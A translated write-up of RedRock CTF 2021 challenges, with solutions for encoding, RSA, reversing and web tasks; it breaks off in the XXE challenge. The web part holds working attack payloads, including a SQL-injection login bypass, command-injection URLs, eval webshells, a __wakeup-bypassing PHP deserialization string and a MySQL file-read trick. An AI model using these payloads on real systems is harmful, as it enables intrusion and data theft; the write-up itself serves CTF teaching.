redrock-wp-2021
redrockctf wp
MISC
一眼看不出flag (can't see the flag at a glance):
Challenge: -.../.-/.-/-.../.-/.-/-.../-.../-.../.-/.-/.-/-.../.-/.-/.-/.-/.-/.-/.-/-.../.-/.-/-.../.-/-.../-.../.-/.-/.-
This is Morse code. Decoding it online gives BAABAABBBAAABAAAAAAABAABABBAAA, which is a Bacon cipher; it decodes to soeasy. Submit redrock{soeasy}.
ELMA:
Challenge:
Following the hint, go to the corresponding site http://www.atoolbox.net/Tool.php?Id=699
Upload the image to decode it, which yields the link https://rin777-1306176007.cos.ap-nanjing.myqcloud.com/lsb.jpg
Opening it shows a damaged QR code.
Repair the finder squares in the corners; scanning the code with WeChat gives the flag redrock{Welc_0meToR3dRo_ckCup}
yyz的流量 (yyz's traffic):
Scrolling through the capture, there are faintly some text packets. Use Wireshark's export function to export and save all HTTP objects. Among the exported files, the one named _ contains the HTML of an upload page. Further down there is a file named 1(1).php, which is a PHP webshell using the eval and str_rot13 functions. Further still, in the file 1(36).php, there is an unusual string:
```
=dee48942104eerqebpx{pr7r1951s077qs97rq166r5838p33r42}
```
We saw earlier that str_rot13 was used, which rotates each letter by 13 positions: rot13 of r is e and rot13 of e is r, and the submission format is redrock{}. Running the string through rot13 gives the flag: redrock{ce7e1951f077df97ed166e5838c33e42}.
CRYPTO
base全家桶 (the whole base family):
```
3441353234333536353535323433343434423539354135353435353233323442344134323435343535333536343235333443343234383535343535363442343634373441343735343435353533323530343934413437343634463444353235353439344534323535353535363533344334423532343235343439353333323534344134453441343534353532353335363442354134413535344435343332343334433441343434353533344433323535344234363438343434423535344235353439343634383535353735363533344334423441343635353442353234423535343734453434343533343536353333323443343234423536344435313533353234413445343634363531353633323434344135363432343634443532333233323441353234343436343334453433343434423436343635363533353734423537344134443333343535373536344234463442344134413535344234453433353534413445343434353446353635323533344235353541343634353531353335323441343234423534333235303441333534383535333635343332334433443344
```
Two rounds of base16 decoding, then two rounds of base32, then two rounds of base64; online base tool: https://ctf.bugku.com/tools
redrock{bf05214a2d78d93479788d7539e65c46}
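Peeling a layered base16/base32/base64 string by hand is error-prone, so here is an added example (not from the original writeup) that detects each layer from its alphabet and strips them in order; the SAMPLE is a constructed flag wrapped with the same six layers as the challenge string above.

```python
import base64
import string

def wrap(plain: bytes) -> str:
    """Constructed sample: encode with base64 x2, base32 x2, base16 x2 (decode peels it in reverse)."""
    data = plain
    for enc in (base64.b64encode, base64.b64encode, base64.b32encode, base64.b32encode,
                base64.b16encode, base64.b16encode):
        data = enc(data)
    return data.decode()

SAMPLE = wrap(b"redrock{constructed_example}")

HEX = set("0123456789abcdefABCDEF")
B32 = set(string.ascii_uppercase + "234567=")
B64 = set(string.ascii_letters + string.digits + "+/=")

def guess_layer(s: str):
    """Pick the most restrictive alphabet the text fits in; return (name, decoder) or None.
    Order matters: every hex string is valid base32/base64 text, so test hex first."""
    chars = set(s)
    if chars <= HEX and len(s) % 2 == 0:
        return "base16", lambda t: base64.b16decode(t.upper())
    if chars <= B32 and len(s) % 8 == 0:
        return "base32", base64.b32decode
    if chars <= B64 and len(s) % 4 == 0:
        return "base64", base64.b64decode
    return None

def peel(s: str, max_layers: int = 16):
    """Strip encoding layers until the data no longer looks encoded or stops being text.
    Returns (list of layer names in the order they were removed, final text)."""
    layers, cur = [], s.strip()
    for _ in range(max_layers):
        g = guess_layer(cur)
        if g is None:
            break
        name, dec = g
        try:
            text = dec(cur.encode()).decode("ascii")
        except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
            break
        if not text.isprintable():
            break
        layers.append(name)
        cur = text
    return layers, cur

if __name__ == "__main__":
    print(peel(SAMPLE))
```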
福尔摩斯卷卷 (Sherlock Juanjuan):
```
kb51c4017d556b1fb96d271d56e4c0c93l
```
We are given a special string and the number 2. Rail-fence decryption with 2 rails gives k9b65d12c7410d1576de545c60bc19f3bl; an online md5 lookup gives thecat, flag: redorock{thecat}.
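The 2-rail step above is an instance of the general zigzag rail-fence cipher; as an added example (not the online tool the writeup used), here is a decryptor for any number of rails, checked against its own encryptor, run on the challenge string, followed by the MD5 comparison for a candidate word.

```python
import hashlib

def rail_pattern(n, rails):
    """Rail index of each plaintext position in the zigzag: 0,1,..,rails-1,rails-2,..,1,0,1,.."""
    pattern, rail, step = [], 0, 1
    for _ in range(n):
        pattern.append(rail)
        if rails == 1:
            continue
        if rail == 0:
            step = 1
        elif rail == rails - 1:
            step = -1
        rail += step
    return pattern

def rail_fence_encrypt(pt, rails):
    """Read the zigzag rail by rail (used here only to check the decryptor)."""
    pattern = rail_pattern(len(pt), rails)
    return "".join(ch for r in range(rails) for ch, p in zip(pt, pattern) if p == r)

def rail_fence_decrypt(ct, rails):
    """Invert: count how many ciphertext chars belong to each rail, slice them out,
    then walk the zigzag again handing out the next char from the matching rail."""
    pattern = rail_pattern(len(ct), rails)
    queues, pos = [], 0
    for r in range(rails):
        size = pattern.count(r)
        queues.append(list(ct[pos:pos + size]))
        pos += size
    return "".join(queues[r].pop(0) for r in pattern)

def md5_matches(word, digest):
    """The challenge's last step: the recovered 32 hex chars are an MD5 to look up."""
    return hashlib.md5(word.encode()).hexdigest() == digest.lower()

# The challenge string from above and its 2-rail parameter
CHALLENGE = "kb51c4017d556b1fb96d271d56e4c0c93l"

def solve(ct=CHALLENGE, rails=2):
    """Returns (decrypted string, the 32-hex MD5 between the outer 'k' and 'l')."""
    plain = rail_fence_decrypt(ct, rails)
    return plain, plain[1:-1]

if __name__ == "__main__":
    print(solve())   # ('k9b65d12c7410d1576de545c60bc19f3bl', '9b65d12c7410d1576de545c60bc19f3b')
```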
rsa1.txt:
```
p=147612109163370473726853940149285791098788760038966902274068135592961283314637173338522787501221233131551934112621199764391055903055665279340723435443214438803958052928508552115094413883509444599367111269535437533008007741722534136778697906522597440831904650183582467394987289371711734685640404907683000858869
```
We know the primes p and q, the public exponent e and the ciphertext c. Find a python RSA decryption script online and change the values.
Original link: https://blog.csdn.net/qq_40657585/article/details/84874073
```
#!/usr/bin/python
```
Running it gives flag{rsa_is_so_eeeeeeasy}
rsa2.txt:
```
n=27165699915478709899591037909826730786499370104451475178959677543485932094152566857665100521244621688426173292606958647441926888982292857459950857121109158161417783978032371470391030158208122646010467257809663979992182107935125521808536962013120865546513540563130603293071529020712172040077444698746824359887941345818662045893966193039118981343228426520585886421937556928721831233403243298340607111229786172645138352024466710627334325187128901680598546484484520891371243651986807815831171755575193464079906876262015978739931088486581874643062651911618853280170017666942391286592194127295774862811346780551960902842223
```
```
import gmpy2
```
Given n, e and c. Factor n with yafu, which finds the two primes:
```
P309 = 164820204815667881451830216997273520673704160510528999288311267052928164929154110870792893999538507439807665465929918937860909796806255428508049083149603281706883650885793534757491123121348204344560340210813782875319255176850113664114440116798695137487762411727155531291658550163709763022464037056557871355317
P309 = 164820204815667881451830216997273520673704160510528999288311267052928164929154110870792893999538507439807665465929918937860909796806255428508049083149603281706883650885793534757491123121348204344560340210813782875319255176850113664114440116798695137487762411727155531291658550163709763022464037056557871353619
```
Modify the values in the rsa1 script.
```
#!/usr/bin/python
```
The result is flag{yafuuuuuuuuuuu!!}
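The two yafu factors above differ only in their last few digits, which is exactly the situation Fermat's method exploits (and why such a modulus is weak). As an added example, not the script linked from this page, here is Fermat factoring followed by the rsa1-style decryption on a constructed modulus with assumed values P, Q, E and the message b"yafu":

```python
from math import isqrt

def fermat_factor(n):
    """Fermat's method: n = a^2 - b^2 = (a-b)(a+b). When p and q are close,
    a = ceil(sqrt(n)) is already (p+q)/2, so the loop ends after a step or two.
    Returns (larger factor, smaller factor, steps taken)."""
    a = isqrt(n)
    if a * a < n:
        a += 1
    steps = 1
    while True:
        b2 = a * a - n
        b = isqrt(b2)
        if b * b == b2:
            return a + b, a - b, steps
        a += 1
        steps += 1

def rsa_decrypt(c, e, p, q):
    """Textbook RSA decryption once p and q are known: d = e^-1 mod phi(n), m = c^d mod n."""
    phi = (p - 1) * (q - 1)
    d = pow(e, -1, phi)               # modular inverse, Python 3.8+
    m = pow(c, d, p * q)
    return m.to_bytes((m.bit_length() + 7) // 8, "big")

# Constructed key: two primes only 6 apart, so Fermat's method finds them at once,
# the same way yafu split the two 309-digit primes above that share all but their last digits.
P, Q = 104723, 104729                  # assumed values, small enough to check by hand
N, E = P * Q, 65537
C = pow(int.from_bytes(b"yafu", "big"), E, N)   # constructed ciphertext of the message b"yafu"

def solve(n=N, e=E, c=C):
    """Factor, then decrypt: the whole rsa2 workflow without a factoring tool."""
    p, q, _ = fermat_factor(n)
    return rsa_decrypt(c, e, p, q)

if __name__ == "__main__":
    print(fermat_factor(N))            # (104729, 104723, 1)
    print(solve())                     # b'yafu'
```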
rsa3.txt:
```
n=12193165491232590150686982432557244804300750963175008178236581194544171828897340736916176149173721551510190319108772113575377325860653421908067617797675141336620007755973554040917786258089348023269695843501039718996399429207128831592342485274073559355787675660026139594401556004887413636861987542041178448038883087652407784191872220121749480825916533097977902472760860392352675957455292246566059496154702620024668875067749860935756039381451038144741567698966832403739607807494155714430462171863146787192405435943867107310410641010836155850842469201306161627801130957327434956927373515462512612188696131269636192461423
```
The challenge gives n, e and c. n is too large to factor, but e=3, so adapt a script found online (original link https://blog.csdn.net/m0_46230316/article/details/105904020; use Kali's python3, otherwise you run into third-party library problems).
```
#!/usr/bin/env python
```
The output is 0x666c61677b333333333333333333333333333333337d; converting the hex to a string online gives flag{3333333333333333}.
rsa4.txt:
```
n=21986952806083130275797030452868092210388137103595814788381248228107929558485767818149518117932024450374044287378157581547697424876342510478383269724874135655601388068311221551534992774719985788098089299398773525516314130692671612649055459290980711341053921160651223628975025276916068562487276949413795212067701663409252958915147001221841172575522092200851913186869160247427103350875050014227644172312145910978929739518600818119553066877138825546574926506980419695756570336121367807763597790159805982689429185389067077219495106100710784490003787384470363349515390928245929021470777491993247675208476744147539290542079
```
The challenge gives one n, two ciphertexts c and two exponents e, so a common modulus attack applies; original link: https://www.cnblogs.com/P201521440001/p/11439344.html. Fill in the data and run it.
```
from libnum import n2s,s2n
```
The result is 0x666c61677b436f6d6d6f6e5f4d6f64756c75735f41747461636b7d; converting the hex to a string online gives the final flag{Common_Modulus_Attack}
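As an added example covering both rsa3 (e=3 with no padding) and rsa4 (one n, two exponents), and not the scripts linked above: the low-exponent root attack and the common modulus attack, each run on a constructed modulus with assumed values N, E1, E2 and constructed messages. Neither attack needs to factor N, which is why both weaknesses matter even for properly sized keys.

```python
def iroot(k, n):
    """Integer k-th root: the largest r with r**k <= n (integer Newton iteration)."""
    if n < 2:
        return n
    r = 1 << ((n.bit_length() + k - 1) // k)     # starts at or above the true root
    while True:
        s = ((k - 1) * r + n // pow(r, k - 1)) // k
        if s >= r:
            return r
        r = s

def small_e_root(c, e, n, max_k=100000):
    """rsa3 case: with e=3 and no padding, m**3 is often smaller than n, so c is m**3
    itself and an integer cube root recovers m; otherwise try c + k*n for small k."""
    for k in range(max_k):
        x = c + k * n
        r = iroot(e, x)
        if pow(r, e) == x:
            return r
    return None

def egcd(a, b):
    """Extended Euclid: returns (g, s, t) with s*a + t*b == g."""
    if b == 0:
        return a, 1, 0
    g, s, t = egcd(b, a % b)
    return g, t, s - (a // b) * t

def common_modulus(n, e1, c1, e2, c2):
    """rsa4 case: one message under the same n with coprime e1, e2. Find s1*e1 + s2*e2 = 1;
    then c1^s1 * c2^s2 = m^(s1*e1 + s2*e2) = m (mod n). A negative s means a modular inverse."""
    g, s1, s2 = egcd(e1, e2)
    if g != 1:
        raise ValueError("e1 and e2 must be coprime")
    if s1 < 0:
        c1, s1 = pow(c1, -1, n), -s1
    if s2 < 0:
        c2, s2 = pow(c2, -1, n), -s2
    return pow(c1, s1, n) * pow(c2, s2, n) % n

def to_bytes(m):
    return m.to_bytes((m.bit_length() + 7) // 8, "big")

# Constructed modulus (product of two assumed 17-bit primes); neither attack needs to factor it.
N = 104723 * 104729
E1, E2 = 65537, 3
M_SMALL = 1337                           # 1337**3 < N, so pow(M_SMALL, 3, N) is just 1337**3
C_SMALL = pow(M_SMALL, E2, N)
M = int.from_bytes(b"same", "big")      # one message, encrypted twice under the same N
C1, C2 = pow(M, E1, N), pow(M, E2, N)

if __name__ == "__main__":
    print(small_e_root(C_SMALL, E2, N))                 # 1337
    print(to_bytes(common_modulus(N, E1, C1, E2, C2)))  # b'same'
```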
RE
easy_py:
Challenge link: https://www.lanzouw.com/iNYNTwvaa5i
Password: 2ktr
The file is an exe with a Python icon. Unpack it with pyinstxtractor; there is no main file in the exe_extracted directory and PYZ-00.pyz_extracted is empty, but the top-level directory contains python.pyc and struct.pyc. Try to decompile the pyc files with uncompyle6:
```
PS D:\文档> uncompyle6 .\struct.pyc
```
Decompiling Python 3.9 bytecode is not supported. Looking at the binary contents of python.pyc with xxd instead reveals a very flag-like string:
```
000002f0: 094e e905 0000 007a 0566 6c61 677b e9ff .N.....z.flag{..
```
Run easy_py.exe directly and enter the guessed flag{P9tH0n_1_l0v@_90u_50_muChz}: it prints good but says it is not perfect. Reading the flag as "python i love you so much", drop the trailing z; flag{P9tH0n_1_l0v@_90u_50_muCh} is accepted.
cythonic:
```
3 0 LOAD_GLOBAL 0 (input)
```
According to the challenge hint, Python's dis module is involved: the task is to rebuild the Python source from the output of dis.dis(). The rightmost column holds some of the data the source contains, the first column is the source line number and the third column is the opcode mnemonic. I did not manage to reconstruct the source completely (the cythonic listing has GET_ITER and FOR_ITER opcodes but no SETUP_LOOP; I do not know whether it was like that originally or whether a line is missing, and the for loop I added produces an extra SETUP_LOOP), but it is close enough to see what the source looked like.
```
import dis
```
With the source reconstructed, write the inverse of the encryption routine:
```python
import dis

def hello():
    # Original program: read the user's flag and check its length
    # usr_flag = input('EasyEasyEasy!')
    # if (len(usr_flag) != 48):
    #     exit(77777)
    # Placeholder input of the right length so the decryption loop below runs
    usr_flag = [str((i % 10)) for i in range(48)]
    usr_flag = ''.join(usr_flag)
    print(usr_flag)
    # Expected encrypted values recovered from the bytecode constants
    ints = [187, 187, 174, 145, 207, 175, 194, 133, 181, 160, 201, 180, 181, 225, 168, 195, 217, 166, 135, 163, 219, 143, 134,
            180, 190, 255, 155, 156, 243, 252, 158, 233, 130, 153, 235, 230, 187, 204, 239, 205, 176, 147, 144, 248, 187, 186, 254, 252]
    digits = list(map(ord, list('https://space.bilibili.com/672328094')))
    key = []
    key.append('y')
    key.append('b')
    key.append('b')
    Hai = []
    for i, j in enumerate(usr_flag):
        # Original check: (ord(j) + ord(key[i % 3])) ^ digits[i % 36] must equal ints[i]
        # Hai.append((ord(j) + ord(key[i % 3])) ^ (digits[i % 36]))
        # Inverse: undo the XOR with the same byte, then subtract the key byte
        Hai.append((ints[i] ^ digits[i % 36]) - ord(key[i % 3]))
    if Hai == ints:
        print('WelCome')
    for a in Hai:
        print(chr(a), end='')

# dis.dis(hello)
hello()
```
The output is an encoded string, ZmxhZ3tHdWFuWmh1SmlhUmFuX0R1bl4yX0ppZV9DaGFufQ==; base64 decoding gives the flag: flag{GuanZhuJiaRan_Dun^2_Jie_Chan}.
WEB
我要黑了红岩网校 (I'm going to hack the Redrock web school):
Run a directory scan with 御剑 (Yujian). There is a robots.txt; visiting it gives the flag.
卷卷的backdoor (Juanjuan's backdoor):
Go source:
```
package main
```
Download the attachment and analyse the source: there are two methods, GET and PUT. A GET shows the normal page, while a PUT to /hacked-by-yyz-from-sre should call backdoor and display the flag. Open Burp Suite, capture the request, send it to Repeater, change the request as below and send it.
```
PUT /hacked-by-yyz-from-sre HTTP/1.1
Host: 928cc5cc-f8d3-4e90-87d3-b7cc9e2406db.ctf.redrock.team
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: -----------------------------------(use your own cookie)
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
```
The response contains redrock{3abcfa3d-a5c5-4790-9264-a4c897189be3}.
ez_exec:
First bypass the login with a universal password: account admin, password "or"="a'='a. Inside is a command execution. ls works, but spaces and commands such as cat, nl and more are filtered. The space can be bypassed with %09, and less is not filtered, so files can be read with less.
```
payload=/ping.php?ip=127.0.0.1;less%09ping.php;
```
This reveals the ping.php source, which also filters the string flag. Going up to the root directory reveals the flag file:
```
/ping.php?ip=127.0.0.1;cd%09../../../../../;ls;
```
The name flag is filtered, but backticks can be used so that the output of ls becomes the argument, bypassing the filter.
```
payload=/ping.php?ip=127.0.0.1;cd%09../../../../../;ls;less%09`ls`;
```
Finally the flag appears: redrock{45a27061-e33f-43e4-a750-b96309c9172c}.
easynodejs:
Look at the page source; the last line points to a file. Download it and read its source.
The key code is:
```javascript
if (username !== 'admin' && username == 'admin' && password == "admin") {
    message = 'login success!! flag is ' + flag;
}
```
This relies on Node.js's loose typing: an array like ['admin'] is not strictly identical (!==) to the string 'admin', yet loosely equals (==) it after type coercion. Open Burp, modify the request body as follows and send it:
```
username[0]=admin&password=admin
```
The flag is returned: redrock{b5ed9cab-ed27-4f1a-bfb5-4ad53802d755}.
myshopxo:
A directory scan finds robots.txt, which reveals www.zip; download it directly for the source. Auditing it with the PHP code-audit tool RIPS turns up /application/index/view/lengyu/index/star.php, whose content is
```
1);@eval($_POST[1]); echo md5(
```
Connect with AntSword (蚁剑); the login succeeds. Files can be created in the current directory, but system commands fail, so create a new PHP shell:
```
$_REQUEST["password"]); @assert(
```
A GET request shows the phpinfo() output. Following the hint, disable_functions (df) has to be bypassed; a PHP probe script found online shows that a whole pile of functions are disabled.
PHP probe
```php
<?php
header("content-Type: text/html; charset=utf-8");
header("Cache-Control: no-cache, must-revalidate");
header("Pragma: no-cache");
error_reporting(0);
ob_end_flush();
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Pragma" content="No-cache" />
<meta http-equiv="Expires" content="0" />
<meta http-equiv="cache-control" content="private" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><!-- added this line to see whether it fixes garbled output on Linux -->
<title>PHP 探针 v1.0</title>
<style type="text/css">
<!--
body{text-align:center;margin-top:20px;background-color:#a9b674;}
#overview{width:700px;margin:0 auto;text-align:left;}
a{text-decoration:underline;color:#992700;}
.strong{color:#992700;}
.basew{width:300px;}
-->
</style>
</head>
<body>
<div id="overview">
<div id="copyright">版权信息<a href="hello.php?typ=baseinfo">[基本信息]</a> <a href="hello.php?typ=superinfo">[高级信息]</a>
<?php
if (function_exists("phpinfo")){
    echo '<a href="hello.php?typ=phpinfo">[phpinfo]</a>';
}
echo '<br />php探针v1.0 by MKDuse(blueidea-id)<br /><br />此程序代码,可免费使用;但不得用于商业用途;完全转载或使用此代码,请保留版权信息;<br />欢迎指正错误提建议,QQ:122712355</div>';
if (empty($_GET['typ'])){
    baseinfo();
}else{
    switch ($_GET['typ']){
        case 'phpinfo':
            phpinfoview();
            break;
        case 'superinfo':
            superinfo();
            break;
        case 'baseinfo':
            baseinfo();
            break;
        default:
            baseinfo();
    }
}

function getime(){
    $t = gettimeofday();
    return (float)($t['sec'] + $t['usec']/1000000);
}

function baseinfo(){
    echo '<h1>基本信息</h1>';
    $arr[]=array("Current PHP version:",phpversion());
    $arr[]=array("Zend engine version:",zend_version());
    $arr[]=array("服务器版本",$_SERVER['SERVER_SOFTWARE']);
    $arr[]=array("ip地址",$_SERVER['REMOTE_HOST']);//ip
    $arr[]=array("域名",$_SERVER['HTTP_HOST']);
    $arr[]=array("协议端口",$_SERVER['SERVER_PROTOCOL'].' '.$_SERVER['SERVER_PORT']);
    $arr[]=array("站点根目录",$_SERVER['PATH_TRANSLATED']);
    $arr[]=array("服务器时间",date('Y年m月d日,H:i:s,D'));
    $arr[]=array("当前用户",get_current_user());
    $arr[]=array("操作系统",php_uname('s').php_uname('r').php_uname('v'));
    $arr[]=array("include_path",ini_get('include_path'));
    $arr[]=array("Server API",php_sapi_name());
    $arr[]=array("error_reporting level",ini_get("display_errors"));
    $arr[]=array("POST提交限制",ini_get('post_max_size'));
    $arr[]=array("upload_max_filesize",ini_get('upload_max_filesize'));
    $arr[]=array("脚本超时时间",ini_get('max_execution_time').'秒');
    if (ini_get("safe_mode")==0){
        $arr[]=array("PHP安全模式(Safe_mode)",'off');
    }else{
        $arr[]=array("PHP安全模式(Safe_mode)",'on');
    }
    if (function_exists('memory_get_usage')){
        $arr[]=array("memory_get_usage",ini_get('memory_get_usage'));
    }
    //$arr[]=array("可用空间",intval(diskfreespace('/')/(1024 * 1024))."M");
    echo '<table>';
    for($i=0;$i<count($arr);$i++){
        $overview='<tr><td class="basew">'.$arr[$i][0].'</td><td>'.$arr[$i][1].'</td></tr>';
        echo $overview;
    }
    echo '</table>';
    echo '<h2>服务器性能测试</h2>';
    echo '<table><tr><td>服务器</td><td>整数运算<br />50万次加法(1+1)</td><td>浮点运算<br />50万次平方根(3.14开方)</td></tr>';
    echo '<tr><td>MKDuse的机子(P4 1.5G 256DDR winxp sp2)</td><td>465.08ms</td><td>466.66ms</td></tr>';
    $time_start=getime();
    for($i=0;$i<=500000;$i++){$count=1+1;}
    $timea=round((getime()-$time_start)*1000,2);
    echo '<tr class="strong"><td>当前服务器</td><td>'.$timea.'ms</td>';
    $time_start=getime();
    for($i=0;$i<=500000;$i++){sqrt(3.14);}
    $timea=round((getime()-$time_start)*1000,2);
    echo '<td>'.$timea.'ms</td></tr></table>';
?>
<script language="javascript" type="text/javascript">
function gettime(){
    var time;
    time=new Date();
    return time.getTime();
}
start_time=gettime();
</script>
<?php
    echo '<h2>带宽测试</h2>';
    for ($i=0;$i<100;$i++){
        print "<!--1234567890#########0#########0#########0#########0#########0#########0#########0#########012345-->";
    }
?>
<p id="dk"></p>
<script language="javascript" type='text/javascript'>
var timea;
var netspeed;
timea=gettime()-start_time;
netspeed=Math.round(10/timea*1000);
document.getElementById("dk").innerHTML="向客户端发送10KB数据,耗时"+timea+"ms<br />您与此服务器的连接速度为"+netspeed+"kb/s";
</script>
<?php
    echo '<h2>已加载的扩展库(enable)</h2><div>';
    $arr =get_loaded_extensions();
    foreach($arr as $value){
        echo $value.'<br />';
    }
    echo '</div><h2>禁用的函数</h2><p>';
    $disfun=ini_get('disable_functions');
    if (empty($disfun)){
        echo '没有禁用</p>';
    }else{
        echo ini_get('disable_functions').'</p>';
    }
}// end of baseinfo

function superinfo(){
    echo '<h1>高级信息</h1><p>PHP_INI_USER 1 配置选项可用在用户的 PHP 脚本或Windows 注册表中<br> PHP_INI_PERDIR 2 配置选项可在 php.ini, .htaccess 或 httpd.conf 中设置 <br>PHP_INI_SYSTEM 4 配置选项可在 php.ini or httpd.conf 中设置 <br>PHP_INI_ALL 7 配置选项可在各处设置</p>';
    $arr1=ini_get_all();
    for ($i=0;$i<count($arr1);$i++) {
        $arr2=array_slice($arr1,$i,1);
        print_r($arr2);
        echo '<br />';
    }
}

function phpinfoview(){
    phpinfo();
}
?>
</div>
</body>
</html>
```
```
# disabled functions
stream_socket_client,fsockopen,pfsockopen,ini_alter,posix_kill,putenv,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,iconv,system,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,dl,mail
```
Finally I found that PHP's glob function can list directories outside the web root. Upload the following script and open it in the browser:
```php
<?php
$fileList=glob('/*');
for ($i=0; $i<count($fileList); $i++) {
    echo $fileList[$i].'<br />';
}
$fileList2=glob('images/*');
for ($i=0; $i<count($fileList2); $i++) {
    echo $fileList2[$i].'<br />';
}
$fileList3=glob('*');
for ($i=0; $i<count($fileList3); $i++) {
    echo $fileList3[$i].'<br />';
}
```
The listing contains the key entries: two files named flag and readflag. The next step is to read them.
```
bin dev etc flag home lib media mnt proc readflag root run sbin srv sys tmp usr var
```
According to the challenge hint, the source code contains the database credentials. Upload a c99 shell (contact me if you need it), log in to the database as root and inspect the structure: there is an s_admin table with the admin user and its hashed password. An online md5 lookup fails. I thought this pointed to MySQL privilege escalation but had no idea how to proceed, until it occurred to me that MySQL itself might be able to read file contents. Looking it up gave three methods: 1. load_file(), 2. load data infile, 3. system cat. Calling system commands through MySQL had already failed earlier; in the end load data infile read the file successfully.
```php
<?php
$con = mysql_connect("127.0.0.1","root","root");
$select_db = mysql_select_db('shopxo');
if (!$select_db) {
    die("could not connect to the db:\n" . mysql_error());
}
// query
$sql = "load data infile '/flag' into table s_admin";
$res = mysql_query($sql);
if (!$res) {
    die("could get the res:\n" . mysql_error());
}
while ($row = mysql_fetch_assoc($res)) {
    print_r($row);
}
// close the database connection
mysql_close($con);
```
Running this PHP in the browser: the SQL statement is wrong, but the flag shows up in the error message:
```
could get the res: Incorrect integer value: 'redrock{2cb81f52-257c-4187-8a5d-9d3456007631}' for column `shopxo`.`s_admin`.`id` at row 1
```
ez_serialize:
The source is shown as soon as you open the site; it is classic PHP deserialization.
```php
<?php
highlight_file(__FILE__);
error_reporting(0);
include "flag.php";
class Test{
    private $secret;
    function __construct($secret) {
        $this->secret=$secret;
    }
    function __wakeup() {
        $this->secret="error";
    }
    function __destruct() {
        if ($this->secret === "admin") {
            global $flag;
            echo $flag;
        } else {
            die("secret error!");
        }
    }
}
$a = $_GET[serialize];
if (stristr($a, "secret")) {
    die("Go out!!Hacker!!");
} else {
    unserialize($a);
}
```
The script takes a serialize parameter, uses stristr to reject any value containing the string secret, and then unserializes it. Start with a basic payload, ?serialize=O:4:"Test":1:{s:10:"%00Test%00secret";s:5:"admin";} (the %00 bytes are needed because secret is a private property, and the names of private properties are wrapped with the class name and NUL bytes). This does not get past the secret filter. However, when the string type letter s is written as an uppercase S, the contents are parsed as hex escapes, giving ?serialize=O:4:"Test":1:{S:12:"\00\54\65\73\74\00\73\65\63\72\65\74";s:5:"admin";}. There is still a problem: during unserialization the __wakeup method (if present) runs first, so it has to be bypassed. This is a known CVE: when the property count declared in the serialized string is larger than the real number of properties, __wakeup is skipped. The final payload is ?serialize=O:4:"Test":5:{S:12:"\00\54\65\73\74\00\73\65\63\72\65\74";s:5:"admin";} (for this challenge any count greater than 1 works).
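Both tricks above (S: hex escapes hiding the property name from stristr, and a declared property count that does not match the real one) are visible to anyone who parses the string before handing it to unserialize(). As an added example, not part of the original writeup, here is a small inspector for flat serialized PHP objects that decodes S: strings, recovers PHP's visibility encoding of member names, and reports both anomalies; SAMPLE is the final payload discussed above, as it would appear in a request log.

```python
import re

# Constructed sample: the final payload from the writeup, as seen in a request log
SAMPLE = 'O:4:"Test":5:{S:12:"\\00\\54\\65\\73\\74\\00\\73\\65\\63\\72\\65\\74";s:5:"admin";}'

# One scalar token: s/S strings, i integers, b booleans, d floats, N null
TOKEN = re.compile(r'(?:([sS]):\d+:"((?:[^"\\]|\\.)*)";|i:(-?\d+);|b:([01]);|d:(-?[\d.]+);|N;)')

def decode_value(m):
    """Turn one matched token into a Python value; S: strings carry \\xx hex escapes."""
    if m.group(1):
        raw = m.group(2)
        if m.group(1) == "S":
            raw = re.sub(r"\\([0-9a-fA-F]{2})", lambda h: chr(int(h.group(1), 16)), raw)
        return raw
    if m.group(3) is not None:
        return int(m.group(3))
    if m.group(4) is not None:
        return m.group(4) == "1"
    if m.group(5) is not None:
        return float(m.group(5))
    return None

def inspect_php_object(data):
    """Parse a flat serialized object and compare the declared member count with the real one."""
    head = re.match(r'O:\d+:"([^"]*)":(\d+):\{', data)
    if not head:
        raise ValueError("not a serialized PHP object")
    cls, declared = head.group(1), int(head.group(2))
    pos, values, hex_escaped = head.end(), [], False
    while pos < len(data) and data[pos] != "}":
        m = TOKEN.match(data, pos)
        if not m:
            raise ValueError("unparsable token at offset %d" % pos)
        hex_escaped |= m.group(1) == "S"
        values.append(decode_value(m))
        pos = m.end()
    members = dict(zip(values[0::2], values[1::2]))   # keys and values alternate
    return {"class": cls, "declared": declared, "actual": len(members),
            "members": members, "hex_escaped": hex_escaped}

def visibility(key, cls):
    """PHP encodes visibility in the name: \\0Class\\0name is private, \\0*\\0name is protected."""
    if key.startswith("\x00%s\x00" % cls):
        return "private"
    if key.startswith("\x00*\x00"):
        return "protected"
    return "public"

def findings(data):
    """Reasons a defender would reject this string before it ever reaches unserialize()."""
    r = inspect_php_object(data)
    out = []
    if r["declared"] != r["actual"]:
        out.append("member count mismatch: declared %d, found %d (__wakeup bypass pattern)"
                   % (r["declared"], r["actual"]))
    if r["hex_escaped"]:
        out.append("S: hex-escaped strings present; apply keyword filters to the decoded form")
    for key in r["members"]:
        out.append("%s member '%s' of %s" % (visibility(key, r["class"]), key.split("\x00")[-1], r["class"]))
    return out
```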
start xxe:
The challenge says it is an XXE problem. Opening the link shows a login page; the page source has a comment that gives the flag's location.
```
<!--flag is in /flag-->
```
Next, capture the request with Burp, enter admin with any password, and send it.
```
// request sent
POST /doLogin.php HTTP/1.1
Host: 2272c936-816d-4418-93ce-8d9184928b32.ctf.redrock.team
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
